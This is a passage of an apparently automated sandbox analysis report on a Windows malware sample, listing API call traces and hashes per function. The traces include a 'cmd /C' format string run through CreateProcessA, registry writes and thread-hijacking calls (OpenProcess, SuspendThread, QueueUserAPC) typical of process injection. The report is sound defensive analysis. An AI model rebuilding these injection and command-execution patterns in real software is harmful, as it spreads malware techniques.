  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
